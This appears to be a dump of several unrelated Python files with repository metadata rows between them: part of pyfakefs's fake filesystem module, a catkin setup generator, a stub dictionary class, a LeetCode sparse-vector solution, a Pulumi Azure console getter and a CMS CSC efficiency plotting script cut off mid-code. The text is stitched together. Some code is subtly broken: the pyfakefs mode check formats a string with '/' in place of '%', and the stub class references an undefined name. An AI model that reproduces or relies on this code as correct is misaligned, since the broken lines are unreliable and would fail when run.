# line: 4338
return ret_value
# line: 4340
return write_wrapper
# line: 4342
def Size(self):
# line: 4343
'Return the content size in bytes of the wrapped file.'
# line: 4344
return self._file_object.st_size
# line: 4346
def __getattr__(self, name):
# line: 4347
if self._file_object.IsLargeFile():
# line: 4348
raise FakeLargeFileIoException(self._file_path)
# line: 4350
reading = (name.startswith('read') or (name == 'next'))
# line: 4351
truncate = (name == 'truncate')
# line: 4352
writing = (name.startswith('write') or truncate)
# line: 4353
if (reading or writing):
# line: 4354
self._check_open_file()
# line: 4355
if ((not self._read) and reading):
# line: 4356
def read_error(*args, **kwargs):
# line: 4357
'Throw an error unless the argument is zero.'
# line: 4358
if (args and (args[0] == 0)):
# line: 4359
if (self._filesystem.is_windows_fs and self.raw_io):
# line: 4360
return ('' if self._binary else u'')
# line: 4361
self._raise('File is not open for reading.')
# line: 4363
return read_error
# line: 4365
if ((not self.allow_update) and writing):
# line: 4366
def write_error(*args, **kwargs):
# line: 4367
'Throw an error.'
# line: 4368
if self.raw_io:
# line: 4369
if (self._filesystem.is_windows_fs and args and (len(args[0]) == 0)):
# line: 4370
return 0
# line: 4371
self._raise('File is not open for writing.')
# line: 4373
return write_error
# line: 4375
if reading:
# line: 4376
self._sync_io()
# line: 4377
self._flush_for_read()
# line: 4378
if truncate:
# line: 4379
return self._TruncateWrapper()
# line: 4380
if self._append:
# line: 4381
if reading:
# line: 4382
return self._ReadWrapper(name)
else:
# line: 4384
return self._OtherWrapper(name, writing)
# line: 4385
if writing:
# line: 4386
return self._WriteWrapper(name)
# line: 4388
return getattr(self._io, name)
# line: 4390
def _check_open_file(self):
# line: 4391
if ((not self.is_stream) and (not (self in self._filesystem.open_files))):
# line: 4392
raise ValueError('I/O operation on closed file')
# line: 4394
def __iter__(self):
# line: 4395
if (not self._read):
# line: 4396
self._raise('File is not open for reading')
# line: 4397
return self._io.__iter__()
# line: 4400
class FakeDirWrapper(object):
# line: 4402
'Wrapper for a FakeDirectory object to be used in open files list.\n '
# line: 4403
def __init__(self, file_object, file_path, filesystem):
# line: 4404
self._file_object = file_object
# line: 4405
self._file_path = file_path
# line: 4406
self._filesystem = filesystem
# line: 4407
self.filedes = None
# line: 4409
def GetObject(self):
# line: 4410
'Return the FakeFile object that is wrapped by the current instance.'
# line: 4411
return self._file_object
# line: 4413
def fileno(self):
# line: 4414
'Return the file descriptor of the file object.'
# line: 4415
return self.filedes
# line: 4417
def close(self):
# line: 4418
'Close the directory.'
# line: 4419
self._filesystem.CloseOpenFile(self.filedes)
# line: 4422
class FakeFileOpen(object):
# line: 4427
'Faked `file()` and `open()` function replacements.\n\n Returns FakeFile objects in a FakeFilesystem in place of the `file()`\n or `open()` function.\n '
# line: 4428
__name__ = 'FakeFileOpen'
# line: 4430
def __init__(self, filesystem, delete_on_close=False, use_io=False, raw_io=False):
# line: 4438
'init.\n\n Args:\n filesystem: FakeFilesystem used to provide file system information\n delete_on_close: optional boolean, deletes file on close()\n use_io: if True, the io.open() version is used (ignored for Python 3,\n where io.open() is an alias to open() )\n '
# line: 4439
self.filesystem = filesystem
# line: 4440
self._delete_on_close = delete_on_close
# line: 4441
self._use_io = (use_io or (sys.version_info >= (3, 0)) or (platform.python_implementation() == 'PyPy'))
# line: 4443
self.raw_io = raw_io
# line: 4445
def __call__(self, *args, **kwargs):
# line: 4446
'Redirects calls to file() or open() to appropriate method.'
# line: 4447
if self._use_io:
# line: 4448
return self.Call(*args, **kwargs)
else:
# line: 4450
return self._call_ver2(*args, **kwargs)
# line: 4452
def _call_ver2(self, file_path, mode='r', buffering=(-1), flags=None, open_modes=None):
# line: 4453
'Limits args of open() or file() for Python 2.x versions.'
# line: 4455
mode = (flags or mode)
# line: 4456
return self.Call(file_path, mode, buffering, open_modes=open_modes)
# line: 4458
def Call(self, file_, mode='r', buffering=(-1), encoding=None, errors=None, newline=None, closefd=True, opener=None, open_modes=None):
# line: 4484
"Return a file-like object with the contents of the target file object.\n\n Args:\n file_: path to target file or a file descriptor.\n mode: additional file modes. All r/w/a/x r+/w+/a+ modes are supported.\n 't', and 'U' are ignored, e.g., 'wU' is treated as 'w'. 'b' sets\n binary mode, no end of line translations in StringIO.\n buffering: ignored. (Used for signature compliance with __builtin__.open)\n encoding: the encoding used to encode unicode strings / decode bytes.\n New in pyfakefs 2.9.\n errors: ignored, this relates to encoding.\n newline: controls universal newlines, passed to stream object.\n closefd: if a file descriptor rather than file name is passed, and set\n to false, then the file descriptor is kept open when file is closed.\n opener: not supported.\n open_modes: Modes for opening files if called from low-level API\n\n Returns:\n a file-like object containing the contents of the target file.\n\n Raises:\n IOError: if the target object is a directory, the path is invalid or\n permission is denied.\n "
# line: 4485
orig_modes = mode
# line: 4487
binary = ((sys.version_info < (3, 0)) or ('b' in mode))
# line: 4489
mode = mode.replace('t', '').replace('b', '')
# line: 4490
mode = mode.replace('rU', 'r').replace('U', 'r')
# line: 4492
if (not self.raw_io):
# line: 4493
if (mode not in _OPEN_MODE_MAP):
# line: 4494
raise ValueError(('Invalid mode: %r' / orig_modes))
# line: 4495
open_modes = _OpenModes(*_OPEN_MODE_MAP[mode])
# line: 4497
file_object = None
# line: 4498
filedes = None
# line: 4500
if isinstance(file_, int):
# line: 4501
filedes = file_
# line: 4502
wrapper = self.filesystem.GetOpenFile(filedes)
# line: 4503
self._delete_on_close = wrapper.delete_on_close
# line: 4504
file_object = self.filesystem.GetOpenFile(filedes).GetObject()
# line: 4505
file_path = file_object.name
else:
# line: 4507
file_path = file_
# line: 4508
real_path = self.filesystem.ResolvePath(file_path, raw_io=self.raw_io)
# line: 4509
if self.filesystem.Exists(file_path):
# line: 4510
file_object = self.filesystem.GetObjectFromNormalizedPath(real_path)
# line: 4511
closefd = True
# line: 4513
error_class = (OSError if self.raw_io else IOError)
# line: 4514
if (open_modes.must_not_exist and (file_object or self.filesystem.IsLink(file_path))):
# line: 4515
raise error_class(errno.EEXIST, 'File exists', file_path)
# line: 4516
if file_object:
# line: 4517
if ((open_modes.can_read and (not (file_object.st_mode & PERM_READ))) or (open_modes.can_write and (not (file_object.st_mode & PERM_WRITE)))):
# line: 4519
raise error_class(errno.EACCES, 'Permission denied', file_path)
# line: 4520
if open_modes.can_write:
# line: 4521
if open_modes.truncate:
# line: 4522
file_object.SetContents('')
else:
# line: 4524
if open_modes.must_exist:
# line: 4525
raise error_class(errno.ENOENT, 'No such file or directory', file_path)
# line: 4526
file_object = self.filesystem.CreateFileInternally(real_path, create_missing_dirs=False, apply_umask=True, raw_io=self.raw_io)
# line: 4529
if stat.S_ISDIR(file_object.st_mode):
# line: 4530
if self.filesystem.is_windows_fs:
# line: 4531
raise OSError(errno.EPERM, 'Fake file object: is a directory', file_path)
else:
# line: 4533
raise error_class(errno.EISDIR, 'Fake file object: is a directory', file_path)
# line: 4537
file_object.opened_as = file_path
# line: 4539
fakefile = FakeFileWrapper(file_object, file_path, update=open_modes.can_write, read=open_modes.can_read, append=open_modes.append, delete_on_close=self._delete_on_close, filesystem=self.filesystem, newline=newline, binary=binary, closefd=closefd, encoding=encoding, errors=errors, raw_io=self.raw_io, use_io=self._use_io)
# line: 4553
if (filedes is not None):
# line: 4554
fakefile.filedes = filedes
# line: 4556
self.filesystem.open_files[filedes] = fakefile
else:
# line: 4558
fakefile.filedes = self.filesystem.AddOpenFile(fakefile)
# line: 4559
return fakefile
# line: 4562
def _RunDoctest():
# line: 4563
import doctest
# line: 4564
from pyfakefs import fake_filesystem
# line: 4565
return doctest.testmod(fake_filesystem)
# line: 4568
if (__name__ == '__main__'):
# line: 4569
_RunDoctest() | [
"agroce@gmail.com"
] | agroce@gmail.com |
2354e68f86530ec792a0467d7921cdedfcf18ffe | ddb8c14775dfbe9424691dabf1617273d118d317 | /catkin_ws/build/rosbag_to_csv/catkin_generated/generate_cached_setup.py | 75342eae56288eb9bc45fb5511687fd8d0f16df0 | [] | no_license | rishabhdevyadav/fastplanneroctomap | e8458aeb1f2d3b126d27dc57011c87ae4567687a | de9d7e49cb1004f3b01b7269dd398cf264ed92b4 | refs/heads/main | 2023-05-12T22:12:27.865900 | 2021-05-26T19:25:31 | 2021-05-26T19:25:31 | 356,674,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/rishabh/catkin_ws/devel;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/rishabh/catkin_ws/devel/.private/rosbag_to_csv/env.sh')
output_filename = '/home/rishabh/catkin_ws/build/rosbag_to_csv/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"rishabhdevyadav95@gmail.com"
] | rishabhdevyadav95@gmail.com |
8c42e5185cd19ce89eb94c84bb3c322b1804aa6a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_histories.py | 17f1b20f237ac5840ec05fd67dc1b6cdf2391ec7 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py |
#calss header
class _HISTORIES():
def __init__(self,):
self.name = "HISTORIES"
self.definitions = history
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['history']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
cced9e47a43e84015736e4fd09d4ccfba0f30baf | fc5734ad9b0dc154b3a36ec2f5d848b3d693473f | /solutions/Hash Tables/dot_product_of_two_sparse_vectors.py | 896d3a57d9ce44a518484cdc2456a6631b02371e | [
"MIT"
] | permissive | aimdarx/data-structures-and-algorithms | 8e51ec2144b6e0c413bc7ef0c46aba749fd70a99 | 1659887b843c5d20ee84a24df152fb4f763db757 | refs/heads/master | 2023-08-28T12:00:33.073788 | 2021-11-07T08:31:28 | 2021-11-07T08:31:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,652 | py | """
Dot Product of Two Sparse Vectors:
Given two sparse vectors, compute their dot product.
Implement class SparseVector:
SparseVector(nums) Initializes the object with the vector nums
dotProduct(vec) Compute the dot product between the instance of SparseVector and vec
A sparse vector is a vector that has mostly zero values, you should store the sparse vector efficiently and compute the dot product between two SparseVector.
Follow up: What if only one of the vectors is sparse?
Example 1:
Input: nums1 = [1,0,0,2,3], nums2 = [0,3,0,4,0]
Output: 8
Explanation: v1 = SparseVector(nums1) , v2 = SparseVector(nums2)
v1.dotProduct(v2) = 1*0 + 0*3 + 0*0 + 2*4 + 3*0 = 8
Example 2:
Input: nums1 = [0,1,0,0,0], nums2 = [0,0,0,0,2]
Output: 0
Explanation: v1 = SparseVector(nums1) , v2 = SparseVector(nums2)
v1.dotProduct(v2) = 0*0 + 1*0 + 0*0 + 0*0 + 0*2 = 0
Example 3:
Input: nums1 = [0,1,0,0,2,0,0], nums2 = [1,0,0,0,3,0,4]
Output: 6
https://leetcode.com/problems/dot-product-of-two-sparse-vectors
"""
class SparseVector:
def __init__(self, nums):
self.non_zero = {}
for idx, num in enumerate(nums):
if num != 0:
self.non_zero[idx] = num
# Return the dotProduct of two sparse vectors
def dotProduct(self, vec: 'SparseVector'):
total = 0
for idx in self.non_zero:
if idx in vec.non_zero:
total += self.non_zero[idx] * vec.non_zero[idx]
return total
# Your SparseVector object will be instantiated and called as such:
# v1 = SparseVector(nums1)
# v2 = SparseVector(nums2)
# ans = v1.dotProduct(v2)
| [
"noreply@github.com"
] | aimdarx.noreply@github.com |
e485686f7b3e2f193e4c57591b0c968748577699 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/portal/v20181001/get_console.py | ddcd939b6a17147c3b434fa54036381df2a55ba9 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetConsoleResult',
'AwaitableGetConsoleResult',
'get_console',
]
@pulumi.output_type
class GetConsoleResult:
"""
Cloud shell console
"""
def __init__(__self__, properties=None):
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
@property
@pulumi.getter
def properties(self) -> 'outputs.ConsolePropertiesResponse':
"""
Cloud shell console properties.
"""
return pulumi.get(self, "properties")
class AwaitableGetConsoleResult(GetConsoleResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetConsoleResult(
properties=self.properties)
def get_console(console_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetConsoleResult:
"""
Cloud shell console
:param str console_name: The name of the console
"""
__args__ = dict()
__args__['consoleName'] = console_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:portal/v20181001:getConsole', __args__, opts=opts, typ=GetConsoleResult).value
return AwaitableGetConsoleResult(
properties=__ret__.properties)
| [
"noreply@github.com"
] | MisinformedDNA.noreply@github.com |
3dea403c0921ac41742d895248e227a4874a3559 | 706c38c11c2fc64ab9b4a2f66b510ca9f4fa24b9 | /CSCEfficiency/NtupleAnzScripts/Step2_PlotAll_pallete.py~ | c6b0b11ca4c6ca0ec8b4650a040093616f5c678a | [] | no_license | stremreich/CSCefficiency | dd1e428cba0200cb66b1623ae4e6b9effaa205cf | 4d071e4ceec1c2084670f1af049156c338434a98 | refs/heads/master | 2020-03-25T15:11:15.366403 | 2020-02-03T17:55:59 | 2020-02-03T17:55:59 | 143,870,046 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 18,218 | #!/usr/bin/python
#Author: Jinzhong Zhang(zhangjin@cern.ch), Northeastern University, Boston, U.S.A
#################################################################################
#Advanced Usage:
#python Step2_PlotAll.py arg1 arg2
# arg1 is directory of the files given by the TagandProbe cmssw package. The file names have to match what is defined in Config.py;
# arg2 "lct_effV"+arg2 and "seg_effV"+arg2 are the directory name in the TagandProbe result file;
# arg2 can be specified as "bkg" or "sig" for background and signal modeling
#Example1(plot default efficiencies): python Step2_PlotAll.py
#Example2(systematic -- bkg modeling): python Step2_PlotAll.py /uscms/home/zhangjin/nobackup/ bkg
#Example3(systematic -- sig modeling): python Step2_PlotAll.py /uscms/home/zhangjin/nobackup/ sig
#Example4(systematic -- MCTruth ): python Step2_PlotAll.py /uscms/home/zhangjin/nobackup/ mc
#Example2-4 are used for systematic calculation.
##################################################################################
from ROOT import *
import ROOT
from numpy import *
import numpy
from Config import *
gROOT.SetStyle("Plain")
gStyle.SetPaintTextFormat("4.1f")
gStyle.SetOptStat(0)
gStyle.SetFrameBorderMode(0)
gStyle.SetCanvasBorderMode(0)
gStyle.SetPadBorderMode(0)
gStyle.SetPadColor(0)
gStyle.SetCanvasColor(0)
gStyle.SetTitleColor(1)
gStyle.SetStatColor(0)
gStyle.SetFrameFillColor(0)
gStyle.SetFrameLineWidth(0)
gStyle.SetCanvasBorderMode(0)
gStyle.SetCanvasBorderSize(0)
gStyle.SetFrameBorderMode(0)
#gStyle.SetPaveBorderMode(0)
gStyle.SetMarkerStyle(8)
#gStyle.SetMarkerColor(0)
#gStyle.SetHistLineWidth(1.85)
gStyle.SetLineStyleString(2,"[12 12]")
gStyle.SetOptTitle(1)
gStyle.SetOptStat(1)
gStyle.SetOptFit(1)
#gStyle.SetOptTitle(0)
gStyle.SetOptStat(0)
gStyle.SetPadBorderSize(0)
gStyle.SetCanvasBorderSize(0)
gStyle.SetLegendBorderSize(0)
gStyle.SetFrameBorderSize(0)
gStyle.SetStatBorderSize(0)
gStyle.SetTitleBorderSize(0)
#TagProbeFitResult="2015C_newAlign_withHLTIsoTkMu_matchOtherStationsORME13/TnP_"+dir_+"_"#Those files are the TagProbeFitTreeAnalyzer outputs.
TagProbeFitResult="TnP_"+dir_+"_"
Group="Chambers"
if "Chambers" in Group:
chambers=[]
for ec_ in (True,False):
for st_ in (1,2,3,4):
for rg_ in range(1,5) if st_==1 else range(1,3):
if st_!=1 and rg_==1: #ME21,31,41 have 18 chambers
chambers_=range(1,19)
elif st_==4 and rg_==2: #ME42 has 5 chambers on the plus side
chambers_=range(1,37)
# chambers_=(9,10,11,12,13) if ec_ else ()
else: #ME11,12,13,22,32 have 36 chambers
chambers_=range(1,37)
for ch_ in chambers_:
chambers.append( "ME%s%d_%d_%d"%( '+' if (ec_) else '-', st_, rg_, ch_ ) )
n_chambers=len(chambers)
from array import array as arr
#Red = arr('d',[0.00, 0.00, 0.00, 1.00, 1.00])
#Green = arr('d',[0.00, 0.10, 1.00, 1.00, 0.00])
#Blue = arr('d',[1.00, 0.90, 0.00, 0.00, 0.00])
#Length = arr('d',[0.00, 0.40, 0.60, 0.80, 1.00])
#TColor.CreateGradientColorTable(5,Length,Red,Green,Blue,500)
#Red = arr('d',[.00, 1.00, 1.00])
#Green = arr('d',[1.00, 1.00, 0.00])
#Blue = arr('d',[0.00, 0.00, 0.00])
#Length = arr('d',[0.00, 0.5, 1.00])
#TColor.CreateGradientColorTable(3,Length,Red,Green,Blue,500)
#Red = arr('d',[1.00, 1.00, 1.00, .00])
#Green = arr('d',[0., 0.00, 1.00, 1.00])
#Blue = arr('d',[1.00, 0.00, 0.00, 0.00])
#Length = arr('d',[0.00, 0.1, 0.55, 1.00])
#TColor.CreateGradientColorTable(4,Length,Red,Green,Blue,500)
Red = arr('d',[0.,1.00, 1.00, 1.00, .00])
Green = arr('d',[0.,0., 0.00, 1.00, 1.00])
Blue = arr('d',[1.0,1.00, 0.00, 0.00, 0.00])
Length = arr('d',[0.00, 0.4, 0.6, 0.8, 1.00])
TColor.CreateGradientColorTable(5,Length,Red,Green,Blue,500)
gStyle.SetNumberContours(500)
def unshitify(pave):
pave.SetFillStyle(0)
pave.SetBorderSize(0)
cms_label = ROOT.TPaveText(0.06, 0.84, 0.9, 1.0, "NDC")
unshitify(cms_label)
cms_label.SetTextSize(0.03)
cms_label.SetTextAlign(12)
cms_label.AddText("CMS Preliminary #sqrt{s}=13 TeV, 2016B")
# by Nick:
#Float_t rgb[300] = {0}
rgb=zeros(300, dtype=float)
#pEff=zeros(100, dtype=int)
pEff = numpy.ndarray( [100],dtype=numpy.float32)
paletteSize = 100
nContours = 100
for i in range(paletteSize):
rgb[3 * i + 0] = 0.0
rgb[3 * i + 1] = 0.8
rgb[3 * i + 2] = 0.0
if i <= 97:
rgb[3 * i + 0] = 0.5
rgb[3 * i + 1] = 1.0
rgb[3 * i + 2] = 0.0
if i <= 96:
rgb[3 * i + 0] = 1.0
rgb[3 * i + 1] = 1.0
rgb[3 * i + 2] = 0.0
if i <= 94:
rgb[3 * i + 0] = 1.0
rgb[3 * i + 1] = 0.5
rgb[3 * i + 2] = 0.0
if i <= 89:
rgb[3 * i + 0] = 1.0
rgb[3 * i + 1] = 0.0
rgb[3 * i + 2] = 0.0
pEff[i] = ROOT.TColor.GetColor(rgb[3 * i + 0], rgb[3 * i + 1], rgb[3 * i + 2])
# print 'i= ',i,' pEff= ', pEff[i]
#gStyle.SetPalette(paletteSize, pEff)
#gStyle.SetNumberContours(paletteSize)
#print 'pallete: ', paletteSize, ' \n', pEff
#gStyle.SetNumberContours(nContours)
#gStyle.SetOptStat(0)
#gStyle.SetPalette(paletteSize, pEff)
import sys,os,re
if (sys.argv[0] == "python"): args=sys.argv[2:]
else: args=sys.argv[1:]
#Prefix="/scratch/senka/CSCeff_condor_RunC_matching/"
Prefix="/afs/hep.wisc.edu/cms/senka/CMSSW_7_4_7/src/CSCEfficiency/CSCEfficiency/NtupleAnzScripts/"
Postfix=""
print "TagAndProbeFitResult: ",TagProbeFitResult
#TagProbeFitResult=TagProbeFitResult.split("/")[-1]
ResultPlotsFileName=ResultPlotsFileName.split("/")[-1]
print " ->TagAndProbeFitResult: ",TagProbeFitResult
if len(args)>0:
Prefix=args[0]
if Prefix[-1] != "/":
Prefix+="/"
if len(args)>1:
if args[1] == "bkg":
Postfix="_BkgModeling"
elif args[1] == "sig":
Postfix="_SigModeling"
elif args[1] == "mc":
Postfix="_MCTruth"
else:
Postfix=args[1]
ResultPlotsFileName=Prefix+ResultPlotsFileName.replace(".root",Postfix+".root")
file_out=TFile.Open(ResultPlotsFileName,'RECREATE')
etascheme="abseta"
#etascheme="tracks_eta"
phischeme="shiftedphi"
#phischeme="tracks_phi"
if "pt" in Group:
binning="pt"
plotname="tracks_pt_PLOT_"+etascheme+"_bin0_&_"+phischeme+"_bin0"
elif "eta" in Group:
binning="eta"
plotname=etascheme+"_PLOT_"+phischeme+"_bin0_&_tracks_pt_bin0"
elif "phi" in Group:
binning="phi"
plotname=phischeme+"_PLOT_"+etascheme+"_bin0_&_tracks_pt_bin0"
else:
plotname=phischeme+"_bin0__"+etascheme+"_bin0__tracks_pt_bin0__VoigtianPlusExpo"
if Postfix=="_MCTruth":
plotname+="_&_mcTrue_true"
def GetEff(f_in,path="lct_effV",effcat="fit_eff"):
print "LCT eff reading file: ",f_in
try:
eff=f_in.Get("Probes/"+path+"/"+effcat).get().find("efficiency")
return [eff.getVal(),abs(eff.getErrorLo()),eff.getErrorHi()]
except:
print "\033[97mOther problems, skip",f_in.GetName(),"\033[0m"
return [0.]*3
def GetBinnedEffPlot(f_in,path="lct_effV",effcat="fit_eff",st_=0,name_=plotname):
print "binned LCT eff reading file: ",f_in
canvas_=f_in.Get("Probes/"+path+"/"+effcat+"_plots/"+name_)
if not canvas_:
print "\033[91m Warning: Probes/"+path+"/"+effcat+"_plots/"+name_," does not exist in",f_in.GetName(),"\033[0m"
return NULL
dummyplot_=canvas_.GetListOfPrimitives().At(0)
plot_=canvas_.FindObject("hxy_"+effcat).Clone();
#we are going to fix the bugs in tagandprobe package in the following code
#1 - recreate the arrays
nbins=plot_.GetN()
xval=zeros(nbins, dtype=float)
xerr=zeros(nbins, dtype=float)
yerrhi=zeros(nbins, dtype=float)
yerrlo=zeros(nbins, dtype=float)
#2 - the y values are correct
Y=plot_.GetY()
#3 - find the corresponding first bin in the predefined bins for the plot_ first bin0
exec( "bins=%sbin%s"%(binning,str(st_) if binning=="eta" else "") )
X=plot_.GetX()
for abin in bins:
if X[0]<abin:
firstbin=bins.index(abin)-1
break
#4 - fill the yerror bars from the correct input (only for fit efficiency)
if effcat=="fit_eff":
list_=f_in.Get("Probes/"+path).GetListOfKeys()
ikey=list_.First()
while (ikey!=list_.After(list_.Last())):
dirname_=ikey.GetName()
binnumber=re.match(".*"+binning+"_bin(\d*)_.*",dirname_)
if binnumber:
ibin=int(binnumber.group(1))-firstbin
if ibin<nbins and ibin>=0:
result_=f_in.Get("Probes/"+path+"/"+dirname_+"/fitresults")
if result_:
value_=result_.floatParsFinal().find("efficiency")
yerrlo[ibin]=abs(value_.getErrorLo())
yerrhi[ibin]=value_.getErrorHi()
"""
if Y[ibin]!=value_.getVal(): #show differences (should less than 1E-6)
print Y[ibin],
value_.Print()
"""
if Y[ibin]<0.999 and yerrhi[ibin]<1E-7:
yerrhi[ibin]=yerrlo[ibin] #sometime the result misses the high error, we make an approximation: ErrorHi=ErrorLo in this case
if Y[ibin]+yerrhi[ibin]>1.:
yerrhi[ibin]=1.-Y[ibin] # it happens sometime when ErrorHi=ErrorLo
ikey = list_.After(ikey);
#5 - fill the correct x values from the binning
for ibin in range(nbins):
xval[ibin]=(bins[ibin+firstbin]+bins[ibin+firstbin+1])/2.
xerr[ibin]=abs(bins[ibin+firstbin+1]-bins[ibin+firstbin])/2.
#6 - remake the TGraph
plotname_=f_in.GetName().replace(Prefix+TagProbeFitResult,"")[:-5]+path
outputplot=TGraphAsymmErrors(nbins, xval, Y, xerr, xerr, yerrlo, yerrhi)
outputplot.SetName(plotname_)
outputplot.SetTitle(outputplot.GetName())
outputplot.GetXaxis().SetTitle(dummyplot_.GetXaxis().GetTitle())
outputplot.GetYaxis().SetTitle(dummyplot_.GetYaxis().GetTitle())
outputplot.GetYaxis().SetTitleOffset(1.2)
#outputplot.SetMarkerStyle(8)
#outputplot.SetMarkerSize(.5)
"""
outputplot.SetMinimum(0.9)
outputplot.SetMaximum(1.0)
EffCanvas=TCanvas(plotname_,plotname_,500,500)
EffCanvas.cd()
if binning=="pt":
outputplot.GetXaxis().SetLimits(10., 100.);
#gPad.SetLogx()
outputplot.Draw("AP")
raw_input("pause")
"""
return outputplot
if "Stations" in Group:
Effs=[]
for idx in range(1,n_stations+1):
filename_=Prefix+TagProbeFitResult+stations[idx][1]+".root"
if not os.path.isfile(filename_):
print filename_+" is not found, skip.. "
Effs.append([0.]*6)
continue
f_in=TFile(filename_,"READ");
categoryname="cnt_eff" if Postfix=="_MCTruth" else "fit_eff"
if "pt" in Group or "eta" in Group or "phi" in Group:
LCTEff=GetBinnedEffPlot(f_in, "lct_effV"+Postfix,categoryname,stations[idx][3])
SEGEff=GetBinnedEffPlot(f_in, "seg_effV"+Postfix,categoryname,stations[idx][3])
file_out.cd()
if LCTEff:
LCTEff.Write()
if SEGEff:
SEGEff.Write()
else:
Effs.append( GetEff(f_in, "lct_effV"+Postfix,categoryname)+GetEff(f_in,"seg_effV"+Postfix,categoryname) )
f_in.Close()
if not ("pt" in Group or "eta" in Group or "phi" in Group):
Effs=array(Effs).transpose()*100.
xval=array(range(1,n_stations+1))*1.0
xerr=zeros(n_stations, dtype=float)
SEGEff=TGraphAsymmErrors(n_stations, xval, array(Effs[0]), xerr, xerr, array(Effs[1]), array(Effs[2]))
LCTEff=TGraphAsymmErrors(n_stations, xval, array(Effs[3]), xerr, xerr, array(Effs[4]), array(Effs[5]))
SegCanvas=TCanvas("segment efficiency","segment efficiency",500,500)
SegCanvas.cd()
gStyle.SetPaintTextFormat("4.1f")
SEGEff.SetMaximum(100)
SEGEff.SetMinimum(90)
LCTEff.SetMaximum(100)
LCTEff.SetMinimum(90)
SEGEff.SetMarkerStyle(8)
SEGEff.SetMarkerSize(.5)
SEGEff.Draw("AP")
cms_label.Draw()
LCTCanvas=TCanvas("lct efficiency","lct efficiency",500,500)
LCTCanvas.cd()
LCTEff.SetMarkerStyle(8)
LCTEff.SetMarkerSize(.5)
LCTEff.Draw("AP")
cms_label.Draw()
for st in range(1,n_stations+1):
binnum=SEGEff.GetXaxis().FindBin(st)
SEGEff.GetXaxis().SetBinLabel( binnum,stations[st][1] )
LCTEff.GetXaxis().SetBinLabel( binnum,stations[st][1] )
SEGEff.GetXaxis().SetTitle("Ring")
SEGEff.GetYaxis().SetTitle("Chamber within ring")
file_out.cd()
if LCTEff:
LCTEff.Write("LCTEff")
if SEGEff:
SEGEff.Write("SEGEff")
elif "Chambers" in Group:
SEGEff=TH2F("SEGEff","CSC Segment Reconstruction Efficiency (%)",36,1,37,20,-9,9)
SEGEff.SetMarkerSize(0.7)
gStyle.SetPaintTextFormat("4.1f")
SEGEff.SetContour(500)
SEGEff_upErr=TH2F("SEGEff_upErr","segment efficiency uperror",36,1,37,20,-8.7,9.3)
SEGEff_upErr.SetMarkerSize(0.45)
SEGEff_downErr=TH2F("SEGEff_downErr","segment efficiency loerror",36,1,37,20,-9.3,8.7)
SEGEff_downErr.SetMarkerSize(0.45)
SEGEff.GetYaxis().SetTickLength(0)
Chambers_ = ["01","02","03","04","05","06","07","08","09","10","11","12","13","14","15","16","17","18","19","20","21","22","23","24","25","26","27","28","29","30","31","32","33","34","35","36"]
Rings_ = ["ME-42","ME-41","ME-32","ME-31","ME-22","ME-21","ME-13","ME-12","ME-11B","ME-11A","ME+11A","ME+11B","ME+12","ME+13","ME+21","ME+22","ME+31","ME+32","ME+41","ME+42"]
for ich in range(36):
SEGEff.GetXaxis().SetBinLabel(ich+1,Chambers_[ich])
SEGEff_upErr.GetXaxis().SetBinLabel(ich+1,Chambers_[ich])
SEGEff.GetXaxis().SetBinLabel(ich+1,Chambers_[ich])
for irg in range(20):
SEGEff.GetYaxis().SetBinLabel(irg+1,Rings_[irg])
SEGEff_upErr.GetYaxis().SetBinLabel(irg+1,Rings_[irg])
SEGEff_downErr.GetYaxis().SetBinLabel(irg+1,Rings_[irg])
LCTEff=SEGEff.Clone("LCTEff")
LCTEff.SetTitle("LCT efficiency")
LCTEff_upErr=SEGEff_upErr.Clone("LCTEff_upErr")
LCTEff_downErr=SEGEff_downErr.Clone("LCTEff_downErr")
LCTEff.GetYaxis().SetTickLength(0)
